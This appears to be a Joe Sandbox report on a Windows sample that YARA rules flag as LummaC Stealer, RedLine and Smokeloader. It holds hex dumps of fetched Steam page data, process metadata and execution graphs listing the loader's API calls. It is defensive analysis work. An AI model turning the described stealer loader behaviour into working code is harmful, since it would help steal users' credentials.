                                                                                                                                                                                                                                                  2024-12-17 07:14:10 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                  2024-12-17 07:14:10 UTC16384INData Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55
                                                                                                                                                                                                                                                  Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
                                                                                                                                                                                                                                                  2024-12-17 07:14:10 UTC3768INData Raw: 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72
                                                                                                                                                                                                                                                  Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_per
                                                                                                                                                                                                                                                  2024-12-17 07:14:10 UTC500INData Raw: 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76
                                                                                                                                                                                                                                                  Data Ascii: Subscriber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div


                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                  Start time:02:13:58
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\N1sb7Ii2YD.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\N1sb7Ii2YD.exe"
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  File size:432'640 bytes
                                                                                                                                                                                                                                                  MD5 hash:B5BD4911AD7B091685625BAF619CAA97
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2313213319.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                  Start time:02:14:10
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5924 -s 1720
                                                                                                                                                                                                                                                  Imagebase:0xf70000
                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:1.6%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:39.7%
                                                                                                                                                                                                                                                    Signature Coverage:42.5%
                                                                                                                                                                                                                                                    Total number of Nodes:73
                                                                                                                                                                                                                                                    Total number of Limit Nodes:3
                                                                                                                                                                                                                                                    execution_graph 26276 98003c 26277 980049 26276->26277 26291 980e0f SetErrorMode SetErrorMode 26277->26291 26282 980265 26283 9802ce VirtualProtect 26282->26283 26285 98030b 26283->26285 26284 980439 VirtualFree 26289 9804be 26284->26289 26290 9805f4 LoadLibraryA 26284->26290 26285->26284 26286 9804e3 LoadLibraryA 26286->26289 26288 9808c7 26289->26286 26289->26290 26290->26288 26292 980223 26291->26292 26293 980d90 26292->26293 26294 980dad 26293->26294 26295 980dbb GetPEB 26294->26295 26296 980238 VirtualAlloc 26294->26296 26295->26296 26296->26282 26302 43b068 26303 43b080 26302->26303 26306 43b16e 26303->26306 26308 43a9b0 LdrInitializeThunk 26303->26308 26304 43b23f 26306->26304 26309 43a9b0 LdrInitializeThunk 26306->26309 26308->26306 26309->26304 26310 40b44c 26314 40b45a 26310->26314 26315 40b57c 26310->26315 26311 40b65c 26313 43a950 2 API calls 26311->26313 26313->26315 26314->26311 26314->26315 26316 43a950 26314->26316 26317 43a995 26316->26317 26318 43a968 26316->26318 26319 43a976 26316->26319 26322 43a98a 26316->26322 26323 438e70 26317->26323 26318->26317 26318->26319 26321 43a97b RtlReAllocateHeap 26319->26321 26321->26322 26322->26311 26324 438e83 26323->26324 26325 438e94 26323->26325 26326 438e88 RtlFreeHeap 26324->26326 26325->26322 26326->26325 26327 43aecc 26328 43af00 26327->26328 26330 43af7e 26328->26330 26331 43a9b0 LdrInitializeThunk 26328->26331 26331->26330 26332 408790 26334 40879f 26332->26334 26333 408970 ExitProcess 26334->26333 26335 4087b4 GetCurrentProcessId GetCurrentThreadId 26334->26335 26338 40887a 26334->26338 26336 4087da 26335->26336 26337 4087de SHGetSpecialFolderPathW GetForegroundWindow 26335->26337 26336->26337 26337->26338 26338->26333 26339 438e51 RtlAllocateHeap 26340 43ab91 26341 43ab9a GetForegroundWindow 26340->26341 26342 43abad 26341->26342 26348 40d696 26350 40d6f0 26348->26350 26349 40d73e 26350->26349 26352 43a9b0 LdrInitializeThunk 26350->26352 26352->26349 26353 560000 26356 560006 26353->26356 26357 560015 26356->26357 26360 5607a6 26357->26360 26361 5607c1 26360->26361 26362 5607ca CreateToolhelp32Snapshot 26361->26362 26363 5607e6 Module32First 26361->26363 26362->26361 26362->26363 26364 5607f5 26363->26364 26365 560005 26363->26365 26367 560465 26364->26367 26368 560490 26367->26368 26369 5604a1 VirtualAlloc 26368->26369 26370 5604d9 26368->26370 26369->26370 26370->26370 26371 43b3fb 26372 43b2b5 26371->26372 26372->26372 26373 43b3be 26372->26373 26375 43a9b0 LdrInitializeThunk 26372->26375 26375->26373

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 004087B4
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004087BE
                                                                                                                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00408870
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00408972
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4063528623-0
                                                                                                                                                                                                                                                    • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                    • Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 129 5607a6-5607bf 130 5607c1-5607c3 129->130 131 5607c5 130->131 132 5607ca-5607d6 CreateToolhelp32Snapshot 130->132 131->132 133 5607e6-5607f3 Module32First 132->133 134 5607d8-5607de 132->134 135 5607f5-5607f6 call 560465 133->135 136 5607fc-560804 133->136 134->133 139 5607e0-5607e4 134->139 140 5607fb 135->140 139->130 139->133 140->136
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005607CE
                                                                                                                                                                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 005607EE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2313213319.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_560000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3833638111-0
                                                                                                                                                                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                    • Instruction ID: f2ac7dd32b7bcaea2242f36d7a98d77d9b9b43e0297924d86d601794ae2682f4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DF06D322017116FE7203AB9A88DA6F7BE8FF89765F101528E642920C0DAB0F9458A61

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 162 40b44c-40b453 163 40b4c0 162->163 164 40b7e0-40b7f0 162->164 165 40b4e4 162->165 166 40b4c6-40b4dd 162->166 167 40b7a7-40b7b1 162->167 168 40b4ae 162->168 169 40b4f1-40b502 162->169 170 40b4b4 162->170 171 40b6d7-40b6f5 162->171 172 40b797-40b7a0 162->172 173 40b7f7-40b804 162->173 174 40b738-40b756 162->174 175 40b7b8-40b7d9 162->175 176 40b45a-40b467 162->176 163->166 164->173 177 40b4a0-40b4a6 164->177 178 40b6a4-40b6c5 164->178 179 40b48c-40b490 164->179 180 40b46e-40b483 call 43c280 164->180 183 40b6c6-40b6cf 164->183 184 40b588 164->184 185 40b80b 164->185 186 40b60c 164->186 187 40b58e-40b5af 164->187 188 40b650-40b65f call 43a950 164->188 189 40b811-40b82b call 43c280 164->189 190 40b854-40b85d 164->190 191 40b5d5-40b5dc 164->191 192 40b697-40b699 164->192 193 40b620-40b627 164->193 194 40b862 164->194 195 40b662-40b670 call 43a950 164->195 196 40b870-40b880 164->196 197 40b630-40b634 164->197 198 40b5f0-40b605 164->198 199 40b570-40b575 164->199 200 40b5b0-40b5cd 164->200 201 40b830-40b84c call 43c280 164->201 202 40b679 164->202 203 40b63b-40b63f 164->203 204 40b57c-40b57f 164->204 205 40b67e-40b695 call 43c280 164->205 165->169 166->164 166->165 166->167 166->169 166->171 166->172 166->173 166->174 166->175 166->177 166->178 166->179 166->180 166->183 166->184 166->185 166->186 166->187 166->188 166->189 166->190 166->191 166->192 166->193 166->194 166->195 166->196 166->197 166->198 166->199 166->200 166->201 166->202 166->203 166->204 166->205 167->175 167->177 167->178 167->179 167->180 167->192 167->205 168->170 206 40b510-40b562 169->206 170->163 181 40b700-40b71c 171->181 172->164 172->167 172->173 172->175 172->177 172->178 172->179 172->180 172->183 172->184 172->185 172->186 172->187 172->188 172->189 172->190 172->191 172->192 172->193 172->194 172->195 172->196 172->197 172->198 172->199 172->200 172->201 172->202 172->203 172->204 172->205 173->177 173->178 173->179 173->180 173->185 173->189 173->190 173->192 173->201 173->205 182 40b760-40b77c 174->182 175->164 175->173 175->177 175->178 175->179 175->180 175->183 175->184 175->185 175->186 175->187 175->188 175->189 175->190 175->191 175->192 175->193 175->194 175->195 175->196 175->197 175->198 175->199 175->200 175->201 175->202 175->203 175->204 175->205 176->177 176->178 176->179 176->180 177->168 179->177 180->179 181->181 213 40b71e-40b732 181->213 182->182 214 40b77e-40b792 182->214 183->171 186->193 187->200 188->195 189->201 211 40b69b 190->211 191->177 191->178 191->179 191->180 191->185 191->189 191->190 191->192 191->198 191->201 191->202 191->204 191->205 192->211 193->177 193->178 193->179 193->180 193->184 193->185 193->187 193->189 193->190 193->191 193->192 193->197 193->199 193->200 193->201 193->202 193->204 193->205 195->202 197->203 198->177 198->178 198->179 198->180 198->184 198->185 198->186 198->187 198->188 198->189 198->190 198->191 198->192 198->193 198->195 198->199 198->200 198->201 198->202 198->204 198->205 199->177 199->178 199->179 199->180 199->185 199->189 199->190 199->192 199->201 199->202 199->204 199->205 200->191 201->190 202->205 224 40b646 203->224 204->184 205->192 206->206 216 40b564-40b567 206->216 211->178 213->174 214->171 216->199 224->188
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: h d"
                                                                                                                                                                                                                                                    • API String ID: 0-862628183
                                                                                                                                                                                                                                                    • Opcode ID: 907832ec394077f3cb61ce921fa134c81a3c0afbaec0ddbe82e25e94bded95fe
                                                                                                                                                                                                                                                    • Instruction ID: e7b26040d347b48bd15f509a2e92d141a5522c4f34e33ed28b849909e17f734e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 907832ec394077f3cb61ce921fa134c81a3c0afbaec0ddbe82e25e94bded95fe
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81B1CF79204700CFD3248F74EC91B67B7F6FB4A301F058A7DE99682AA0D774A859CB18

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 254 43a9b0-43a9e2 LdrInitializeThunk
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: ihgf
                                                                                                                                                                                                                                                    • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                    • Opcode ID: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                                    • Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                                    • Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 0 98003c-980047 1 980049 0->1 2 98004c-980263 call 980a3f call 980e0f call 980d90 VirtualAlloc 0->2 1->2 17 98028b-980292 2->17 18 980265-980289 call 980a69 2->18 20 9802a1-9802b0 17->20 22 9802ce-9803c2 VirtualProtect call 980cce call 980ce7 18->22 20->22 23 9802b2-9802cc 20->23 29 9803d1-9803e0 22->29 23->20 30 980439-9804b8 VirtualFree 29->30 31 9803e2-980437 call 980ce7 29->31 33 9804be-9804cd 30->33 34 9805f4-9805fe 30->34 31->29 36 9804d3-9804dd 33->36 37 98077f-980789 34->37 38 980604-98060d 34->38 36->34 42 9804e3-980505 LoadLibraryA 36->42 40 98078b-9807a3 37->40 41 9807a6-9807b0 37->41 38->37 43 980613-980637 38->43 40->41 44 98086e-9808be LoadLibraryA 41->44 45 9807b6-9807cb 41->45 46 980517-980520 42->46 47 980507-980515 42->47 48 98063e-980648 43->48 52 9808c7-9808f9 44->52 49 9807d2-9807d5 45->49 50 980526-980547 46->50 47->50 48->37 51 98064e-98065a 48->51 53 980824-980833 49->53 54 9807d7-9807e0 49->54 55 98054d-980550 50->55 51->37 56 980660-98066a 51->56 57 9808fb-980901 52->57 58 980902-98091d 52->58 64 980839-98083c 53->64 59 9807e2 54->59 60 9807e4-980822 54->60 61 9805e0-9805ef 55->61 62 980556-98056b 55->62 63 98067a-980689 56->63 57->58 59->53 60->49 61->36 65 98056d 62->65 66 98056f-98057a 62->66 67 98068f-9806b2 63->67 68 980750-98077a 63->68 64->44 69 98083e-980847 64->69 65->61 71 98059b-9805bb 66->71 72 98057c-980599 66->72 73 9806ef-9806fc 67->73 74 9806b4-9806ed 67->74 68->48 75 980849 69->75 76 98084b-98086c 69->76 83 9805bd-9805db 71->83 72->83 77 98074b 73->77 78 9806fe-980748 73->78 74->73 75->44 76->64 77->63 78->77 83->55
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0098024D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                    • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                    • Instruction ID: f6b099ca74b8762beffdc98c6061d2e41b751e78b578cd37a8b5982c0e725a0e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64527974A01229DFDBA4CF58C984BA8BBB1BF49304F1480D9E54DAB351DB34AE88DF14

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 123 43ab0b-43ab1f 124 43ab20-43ab7b 123->124 124->124 125 43ab7d-43abce GetForegroundWindow call 43c7d0 124->125
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ForegroundWindow
                                                                                                                                                                                                                                                    • String ID: ilmn
                                                                                                                                                                                                                                                    • API String ID: 2020703349-1560153188
